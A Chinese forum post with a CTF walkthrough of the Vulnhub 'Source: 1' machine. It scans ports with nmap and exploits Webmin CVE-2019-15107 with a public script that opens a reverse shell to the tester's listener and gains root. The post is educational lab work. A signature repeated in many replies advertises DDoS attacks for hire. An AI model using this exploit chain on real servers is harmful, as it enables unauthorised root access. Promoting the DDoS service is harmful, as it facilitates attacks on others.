登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
1
2
/ 2 页
下一页
返回列表
首页
›
业界区
›
业界
›
Vulnhub-Source-1(CVE-2019-15107)
Vulnhub-Source-1(CVE-2019-15107)
[ 复制链接 ]
各卧唯
2025-6-4 21:39:19
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
一、靶机搭建
选择打开选项
选中下载的ova文件,然后导入选择一个存放路径即可
如果遇到不兼容的情况,可以打开
.vmx
修改,改为和虚拟机一个版本号
二、信息收集
官方信息
Name: Source: 1
Date release: 17 Jul 2020
难度:初级
描述:为 AttackerKB 聊天室创建的简单 CTF 盒子。这是练习的独立版本。这个框可能会出现在供应链攻击的后续房间里,因为它是一个很好的最新例子。
复制代码
扫ip
靶机ip:
192.168.108.154
扫开放服务和端口
开放了
22和10000
端口
指纹探测
nmap 192.168.108.154 -p 22,10000 -sV -sC -O --version-all
复制代码
没什么可以利用的信息,看到
10000
端口版本信息,
MiniServ 1.890
(Webmin httpd)
目录扫描
dirsearch
扫描看看,扫不出来
dirb
扫描,无结果
三、Web渗渗透
访问
10000
端口,是一个登录网站,源码和指纹信息都没有什么利用点
想到刚才找到的网站版本号,查找一下历史漏洞
下载下来查看一下,需要结合
msf
才能使用
CVE-2019-15107-Webmin远程命令执行漏洞
上网搜一下看看,存在漏洞,参考文章:
https://github.com/squid22/Webmin_CVE-2019-15107
https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file
复制代码
下载exp到kali
四、提权
赋予权限
开启监听端口,并执行脚本
./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444
复制代码
拿到root权限
在跟目录下发现
flag
flag:
THM{UPDATE_YOUR_INSTALL}
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
Vulnhub
Source
CVE
2019
15107
相关帖子
深度分析MangoBleed(CVE-2025-14847)
SeaTunnel(2.3.12)的高级用法(四):多个source、多个sink
各地省选选做(2019~2023)
用 Vue3 + fetch-event-source 打造流式 AI 翻译平台:OCR + 大模型 + SSE 全链路实战
Ivanti EPMM RCE CVE-2026-1340/1281完整分析
vulnhub靶场breakout-2-morpheus
用 Python 批量提取 1990–2019 年高层建筑并按城市导出 Shapefile
H2O-3反序列化漏洞分析(CVE-2025-6507&CVE-2025-6544)
TCSSOFTDEPTCOPY.zip Can download source code from wps cloud server
[ZJCTF 2019]NiZhuanSiWei
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
深度分析MangoBleed(CVE-2025-14847)
27
260
乱蚣
2026-01-03
业界
SeaTunnel(2.3.12)的高级用法(四):多个source、多个sink
25
68
屋稷删
2026-01-15
业界
各地省选选做(2019~2023)
29
920
院儿饯
2026-01-15
业界
用 Vue3 + fetch-event-source 打造流式 AI 翻译平台:OCR + 大模型 + SSE 全链路实战
11
1007
勺缓曜
2026-02-02
业界
Ivanti EPMM RCE CVE-2026-1340/1281完整分析
14
958
神泱
2026-02-02
业界
vulnhub靶场breakout-2-morpheus
9
42
决台
2026-02-10
安全
用 Python 批量提取 1990–2019 年高层建筑并按城市导出 Shapefile
4
434
荦绅诵
2026-02-16
安全
H2O-3反序列化漏洞分析(CVE-2025-6507&CVE-2025-6544)
6
990
挡缭
2026-03-04
安全
TCSSOFTDEPTCOPY.zip Can download source code from wps cloud server
3
310
啪炽
2026-03-22
业界
[ZJCTF 2019]NiZhuanSiWei
0
713
麓吆
2026-04-05
回复
(30)
锑砖
2025-11-30 16:16:00
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢楼主提供!
康器
2025-12-24 05:39:06
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
收藏一下 不知道什么时候能用到
郦珠雨
2025-12-27 02:42:29
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
鼓励转贴优秀软件安全工具和文档!
赫连如冰
2025-12-29 14:52:59
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
很好很强大 我过来先占个楼 待编辑
咒卖箴
2026-1-14 00:09:01
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
喜欢鼓捣这些软件,现在用得少,谢谢分享!
仟仞
2026-1-17 02:32:06
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
分享、互助 让互联网精神温暖你我
梨恐
2026-1-19 23:09:08
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
用心讨论,共获提升!
闻成
2026-1-20 23:23:10
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
收藏一下 不知道什么时候能用到
昝琳怡
2026-1-21 05:56:53
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
收藏一下 不知道什么时候能用到
袁可佳
2026-1-27 02:26:20
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
用心讨论,共获提升!
倡遍竽
2026-2-3 20:58:56
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢分享,试用一下
纪音悦
2026-2-4 05:16:32
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
谢谢楼主提供!
全叶农
2026-2-4 05:28:32
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
不错,里面软件多更新就更好了
百谖夷
2026-2-6 23:41:53
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
用心讨论,共获提升!
林鱼
2026-2-7 04:41:40
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
前排留名,哈哈哈
娥搽裙
2026-2-7 08:34:39
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
东西不错很实用谢谢分享
闵雇
2026-2-8 21:30:23
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
前排留名,哈哈哈
挚魉
2026-2-9 02:43:37
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
用心讨论,共获提升!
皇甫佳文
2026-2-9 05:45:26
回复
使用道具
举报
照妖镜
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
过来提前占个楼
下一页 »
1
2
/ 2 页
下一页
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
安全
程序
签约作者
程序园优秀签约作者
发帖
各卧唯
2026-2-9 05:45:26
关注
0
粉丝关注
22
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991126
anyue1937
9994892
kk14977
6845359
4
xiangqian
638210
5
神泱
9518
6
韶又彤
9909
7
荪俗
8992
8
宋子
9875
9
蓬森莉
9869
10
俞瑛瑶
10000
查看更多
今日好文热榜
22
AI 编程助手 + 基于 CLI 的 Manus 实现(Ja
714
React 技术深度探讨
257
从分形到森林——使用 Three.js 创建逼真的
557
React 技术深度探讨
997
React 技术深度探讨
466
【读书笔记】【CUDA编程指南】CUDA简介
866
React 技术深度探讨
5
hal库总结学习
931
"Natural-Language Agent Harnesses" 论文
846
自我即自感:一种极简存在论
78
Microsoft Agent Framework + Kimi API 实
354
【节点】[Posterize节点]原理解析与实际应
5
【小记】解决校园网中单播互通的不同子网间
760
GitHub 热门项目 Top 10 | 2026 年 04 月 0
194
Spring Cloud Gateway实战:微服务API网关
789
罗兰艺境GEO内容工程实战复盘:CSDN 92分技
525
MacBook Air 本地运行大语言模型(LLM)
51
【渗透测试】玄机&Maze 全过程wp
795
AI元人文:大儒家观之功夫论——痕迹生生、
277
"Meta-Harness: End-to-End Optimization o